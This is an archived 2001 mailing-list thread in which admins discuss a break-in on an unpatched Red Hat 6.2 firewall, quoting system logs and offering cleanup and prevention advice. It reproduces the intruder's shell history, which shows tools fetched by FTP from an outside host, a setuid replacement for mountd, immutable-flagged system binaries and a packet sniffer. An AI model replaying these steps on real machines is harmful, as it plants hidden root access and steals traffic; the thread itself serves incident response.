[CLUE-Tech] Fwd: Re: blitznet crack attack

Dan Harris coronadh at coronasolutions.com
Fri Jun 15 09:21:09 MDT 2001 

Oops, I almost forgot the bonus question..

The cracker installed a "rootkit".  A root kit is composed of some basic 
utilities that masquerade as valid services.  You'll see he replaced mountd 
and some lib files with his own custom daemon.  This custom daemon probably 
allowed him to connect to a predefined port and dump him right into a root 
shell so that he can cause damage later.  This is called "owning" a box.

As to how he got in, it's hard to say, but my best guess is that he found a 
buffer overflow with one of the running daemons and stuffed the buffer with 
a "useradd" command so that he could then login to a shell.

If the above scenario is true, the biggest mistake was made by not keeping 
up with security updates regarding the daemons the admin was running.  Good 
for him to use portsentry, but in this case the cracker obviously knew 
exactly what exploit was available on the box..could be one of hundreds of 
known exploits.

-Dan Harris

> Bonus Questions: What did the cracker do, and how did he get in? How
> could this have been prevented?
> 
> -JimI.
> 
> Jim Intriglia
> IT Systems and Software Developer
> www.JimIntriglia.com
> 
> Forwarded Message:
>> To: jimintriglia at americanisp.net
>> From: "Jim Intriglia" <jimintriglia at hotmail.com>
>> Subject: Fwd: Re: [Abacus] blitznet hack
>> Date: Fri, 15 Jun 2001 12:39:46 
>> -----
>> 
>> 
>> 
>> >From: "J.D. Stevens" <dave at stevens.com>
>> >To: Ian Campbell <ijac79 at hotmail.com>
>> >CC: abacus at psionic.com
>> >Subject: Re: [Abacus] blitznet hack
>> >Date: Fri, 15 Jun 2001 06:19:12 -0500
>> >
>> >Disconnect from the Internet. Put in a new disk drive for the
>> >operating  system.
>> >Install the operating system of your choice. Install ALL SECURITY
>> >PATCHES. Disable any unnecessary services. Put in appropriate
>> >monitoring, blocking,  and
>> >notification software. I use Tripwire, Portsentry, and Logcheck.
>> >Change all passwords on any machines that this one could sniff. Mount
>> >the hacked disk  read
>> >only in order to extract configurations, account information, etc.
>> >
>> >Be sure to check any systems accessible from or through the hacked
>> >machine.  Who
>> >knows what they picked up with the sniffer.
>> >
>> >Hackers got into my RH 6.2 machine in January through wu-ftd. I had
>> >it configured properly, but didn't get a security patch in soon
>> >enough. After  I
>> >rebuilt, they tried many more times to break in. So far so good.
>> >There are several vulnerabilities in RH 6.2 as it comes out of the
>> >box. The Red Hat  web
>> >site has information on steps to take to secure the system.
>> >
>> >My server is a leased system at Rackspace. They provided excellent
>> >support  after
>> >the hack. They provided the suggestion to put in the new drive and
>> >mount  the old
>> >one read-only. They had the new drive and OS installed within four
>> >hours of  my
>> >call. It took me an additional 14 hours to reconfigure the system. I
>> >do all  of
>> >the work remotely. I've never seen or touched the server.
>> >
>> >   Good luck,
>> >
>> >   Dave Stevens
>> >   STEVENS.COM, Inc.
>> >   Houston, TX, USA
>> >
>> >Ian Campbell wrote:
>> > >
>> > > Well, got a bit of shock this morning when I couldn't ssh into the
>> > > 
>> >firewall at
>> > > a client site.  I got one of the techs there to have a look and
>> > > sure 
>> >enough at
>> > > the login was the message "eth0 running in promiscous mode'  Not a
>> > > good 
>> >start.
>> > >
>> > > The logs shows a lot of things that I don't want to see.
>> > >
>> > >
>> > >
>> > > Jun 15 04:54:33 gw inet: inetd shutdown succeeded
>> > >
>> > > Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete
>> > > 
>> >config
>> > > entry (skipped)
>> > >
>> > > Jun 15 04:54:34 gw inet: inetd startup succeeded
>> > >
>> > > Jun 15 04:55:17 gw inet: inetd shutdown succeeded
>> > >
>> > > Jun 15 04:55:17 gw inet: inetd startup succeeded
>> > >
>> > > Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user
>> > > daemon 
>> >by
>> > > (uid=0)
>> > >
>> > > Jun 15 05:01:55 gw modprobe: Note: /etc/conf.modules is more
>> > > recent than /lib/modules/2.2.14-5.0/modules.dep
>> > >
>> > > Jun 15 05:01:55 gw modprobe: modprobe: Can't locate module
>> > > net-pf-10
>> > >
>> > > Jun 15 05:02:24 gw PAM_pwdb[5628]: (su) session closed for user
>> > > daemon
>> > >
>> > > Jun 15 05:03:07 gw PAM_pwdb[5642]: (su) session opened for user
>> > > daemon 
>> >by
>> > > (uid=0)
>> > >
>> > > Jun 15 05:03:09 gw modprobe: Note: /etc/conf.modules is more
>> > > recent than /lib/modules/2.2.14-5.0/modules.dep
>> > >
>> > > Jun 15 05:03:09 gw modprobe: modprobe: Can't locate module
>> > > net-pf-10
>> > >
>> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from
>> > > host: proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
>> > >
>> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Host
>> > > 130.227.3.123 has 
>> >been
>> > > blocked via wrappers with string: "ALL: 130.227.3.123"
>> > >
>> > > Jun 15 05:04:00 gw portsentry[682]: attackalert: Host
>> > > 130.227.3.123 has 
>> >been
>> > > blocked via dropped route using command: "/sbin/ipchains -I input
>> > > -s 130.227.3.123 -j DENY -l"
>> > >
>> > > Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:04:03 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48032 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:04:09 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48556 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:04:21 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=49656 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:04:45 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=51276 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:07:12 gw modprobe: Note: /etc/conf.modules is more
>> > > recent than /lib/modules/2.2.14-5.0/modules.dep
>> > >
>> > > Jun 15 05:07:12 gw modprobe: modprobe: Can't locate module
>> > > net-pf-10
>> > >
>> > > Jun 15 05:07:20 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64668 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:07:23 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64878 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:07:29 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=65170 F=0x4000
>> > > T=48 
>> >SYN
>> > > (#1)
>> > >
>> > > Jun 15 05:07:41 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=256 F=0x4000
>> > > T=48 SYN 
>> >(#1)
>> > >
>> > > Jun 15 05:08:05 gw kernel: Packet log: input DENY eth1 PROTO=6
>> > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=1618 F=0x4000
>> > > T=48 
>> >SYN (#1)
>> > >
>> > > Jun 15 05:16:51 gw PAM_pwdb[5642]: (su) session closed for user
>> > > daemon
>> > >
>> > > Jun 15 05:17:48 gw kernel: libtty uses obsolete
>> > > (PF_INET,SOCK_PACKET)
>> > >
>> > > Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
>> > >
>> > > Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
>> > >
>> > >
>> > > .bash_history shows what they were up to
>> > >
>> > > ls -al
>> > > pico /etc/inetd.conf
>> > > /etc/et
>> > > /etc/rc.d/init.d/inet restart
>> > > cd /lib/libx.so
>> > > ls -al
>> > > mv xp mountd
>> > > chmod +xs mountd
>> > > ls -al
>> > > ftp h9.s5.com
>> > > ls -al
>> > > hostname
>> > > gunzip *.gz
>> > > ls -al
>> > > tar -xvf blitznet.tar
>> > > tar -xvf psyBNC2.2.1.tar
>> > > ls -al
>> > > rm *.tar
>> > > chown daemon psybnc
>> > > chgrp daemon psybnc
>> > > cd psybnc
>> > > make
>> > > chown daemon *
>> > > chgrp daemon *
>> > > su daemon
>> > > locate bnc
>> > > locate psybnc
>> > > find / -name psybnc
>> > > cd /
>> > > locate bnc
>> > > cd /lib/libx.so
>> > > ls -al
>> > > cd psybnc
>> > > su daemon
>> > > ls -al
>> > > cd ..
>> > > ls -al
>> > > mv lib libtty
>> > > chmod +x libtty ps
>> > > chmod +xs wipe
>> > > ls -al
>> > > ./ps psybnc libtty mountd hellnine slice2
>> > > chattr +ai /bin/ps
>> > > chattr +ai /bin/.ps
>> > > chattr +ai /bin/login
>> > > ls -al
>> > > ./libtty
>> > > ps -aux
>> > > ls -al
>> > > uptime
>> > > exit
>> > >
>> > >
>> > > So, I'm still not sure how they actually got in.  The box is
>> > > running 
>> >redhat
>> > > 6.2 without any patches.  What now.  How can I  clean my system?
>> > >
>> > > Should I be upgrading my inetd version?  Can anyone offer any
>> > > advice or 
>> >point
>> > > me to security list that can?
>> > >
>> > > Going to be a busy day.
>> > >
>> > > Ian
>> > >
>> > > 
>> >------------------------------------------------------------------------
------
>> > > Get Your Private, Free E-mail from MSN Hotmail at 
>> >http://www.hotmail.com.
>> > >
>> > > _______________________________________________
>> >
>> >--
>> >=====================================================================
>> >Dave Stevens      |    dave at stevens.com   |    http://www.stevens.com
>> >STEVENS.COM, Inc. |      713-419-0313     | http://www.prettygood.net
>> >                   |    Houston, TX, USA   |
>> >=====================================================================
>> >_______________________________________________
>> 
>> _________________________________________________________________ Get
>> your FREE download of MSN Explorer at http://explorer.msn.com
>> 
>> 
> 
> 
> _______________________________________________
> CLUE-Tech mailing list
> CLUE-Tech at clue.denver.co.us
> http://clue.denver.co.us/mailman/listinfo/clue-tech

More information about the clue-tech mailing list